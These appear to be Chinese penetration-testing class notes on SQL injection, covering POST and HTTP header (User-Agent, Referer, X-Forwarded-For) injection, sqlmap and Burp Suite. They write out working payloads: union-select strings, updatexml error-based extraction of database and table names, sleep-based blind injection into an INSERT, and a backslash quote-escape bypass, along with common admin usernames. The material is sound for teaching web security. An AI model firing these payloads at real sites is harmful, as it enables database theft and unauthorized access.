• 一、前言
• 二、上节课补充
  • 1、常用浏览器
  • 2、常用插件
• 三、今日内容
  • 1、什么是POST注入
  • 2、GET注入
  • 3、GET注入和POST注入
  • 4、注入语句分析
  • 5、POST SQLMAP
• 四、HEAD注入
  • 1、127.0.0.1和localhost是抓不到包的
  • 2、头信息可用被获取，获取之后就可以进行处理
  • 3、查询语句的目的：查询数据，展示给用户看
  • 4、插入语句大部分没有回显（联合查询）、盲注、报错注入
  • 5、报错注入
  • 6、如果你没有登录，你觉得网站会记录你的IP或者UA吗？
  • 7、常用账户名
• 五、语句分析
  • 1、所有UA内容之前必须需要加个空格
  • 2、UA：判断你的机器是什么情况
  • 3、代理
  • 4、开发开发网站，一个字一个字码出来？
  • 5、绕过单引号
• 六、总结

一、前言

1、SQLmap -> SQL注入
2、Burpsuite -> 抓包、改包、放包的一个工具

二、上节课补充

1、常用浏览器

IE、火狐、谷歌浏览器、UC、360、QQ浏览器
（1）360浏览器：兼容模式（IE）极速模式（谷歌浏览器）
（2）IE用的很少（政府机关用得多）
（3）推进：火狐（插件）、谷歌（插件）
你现在想要浏览器有一个新的功能

2、常用插件

（1）Proxy SwitchySharp 浏览器的代理
你挂的是系统代理
（2）ModHeader 设置请求头
User_agent(UA)
Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132
MQQBrowser/8.9 Mobile Safari/537.36
（3）Charset_v0.5.2 改变页面编码
页面乱码的原因：编解码方式错误

三、今日内容

1、什么是POST注入

（1）POST -> 传参方式
（2）注入 -> 用户输入的数据被当做代码进行执行

2、GET注入

（显错注入、联合查询注入）
划分种类的方式有很多：
（1）性别：男生、女生
（2）体型：胖的、瘦的
（3）身高：高的、矮的

3、GET注入和POST注入

POST注入：POST传参所产生的注入就是POST注入（没有区别）
GET 和 POST传参的区别：数据本身（编码问题：URL编码）

4、注入语句分析

‘ or 1=1 order by 1 — qwe

‘ or 1=1 union select 1,2,3 limit 1,1 — qwe

select *from user where username = or 1=1 order by 1

select *from user where username =’’ or 1=1 order by 1

A条件 and B条件 [我全要]
A条件 or B条件 [满足一个就可以]

order by 1 [对结果集的排序]

select 1,2,3 from user

select 字段 from 表名

正常情况下。查工资：输出一行数据还是多行数据

select *from user where username =’’ and 1=2
union
select 1,2,3 limit 1,1 — qwe

“) and 1=2 union select 1,2,3 — qwe

5、POST SQLMAP

（1）—form (不稳)
（2） -r 指定数据包 （你想测试社区的发帖sql注入） Cookie 代表你的身份

闭合： ‘ “ ‘) “)

渗透测试 -> 试

四、HEAD注入

HEAD注入 => head传参 （$_SERVER）

1、127.0.0.1和localhost是抓不到包的

2、头信息可用被获取，获取之后就可以进行处理

insert into
网页登录 => 上次登录IP：xxxxx 上次登录设备：xxxxx

3、查询语句的目的：查询数据，展示给用户看

4、插入语句大部分没有回显（联合查询）、盲注、报错注入

5、报错注入

把你想得到的数据放在报错里面显示给你看

报错注入有很多函数

updatexml

updatexml(目标xml内容,xml文档路径,更新的内容)
路径不能出现特殊字符 ~ ！#

updatexml(1,’!123’,1)

concat() 拼接字符串

updatexml(1,concat(‘!’,database()),1)

updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)
报错的结果一定是个字符串

6、如果你没有登录，你觉得网站会记录你的IP或者UA吗？

HEAD注入：登录成功、执行某个操作成功的那一下

7、常用账户名

admin、user、root、test、a、ceshi、jishu、system

五、语句分析

INSERT INTO uagent (uagent,username) VALUES (‘$uagent’,’$uname’)

‘ or sleep(10),1) — qwe
‘ or sleep(10)) — qwe

INSERT INTO uagent (uagent,username) VALUES (‘’ or updatexml(1,concat(‘!’,database()),1),1) — qwe

1、所有UA内容之前必须需要加个空格

2、UA：判断你的机器是什么情况

Referer：你从哪里哪里来

3、代理

我 -> 商家
我 -> A -> 商家
（代理不违法，翻墙是违法的）

透明代理:会告诉访问者真实的IP
高匿代理：不会告诉访问者真实的IP

A -> 网站 （负载均衡、CDN）
网站：图片、视频、log、固定的字体、前端页面
A -> 缓存服务器 -> 真实的网站

真实的网站想获取你的IP怎么办？
请求头：X-FORWORDED-FOR

4、开发开发网站，一个字一个字码出来？

ctrl + c
ctrl + v

mysqli_fetch_array
X-Forworded-For: 127.0.0.1
管理员账户

5、绕过单引号

select *from user where username =’\’ and password=’ admin’
\ 转译 （将代码变成字符串）

六、总结

1、插件
2、POST注入 -r —form
3、HEAD注入 （head传参 $_SERVER） 报错注入
4、UA REFERER X-FORWORDED-FOR
5、代理
6、回显。（插入语句没有回显）
7、\ 转译字符绕过’过滤的问题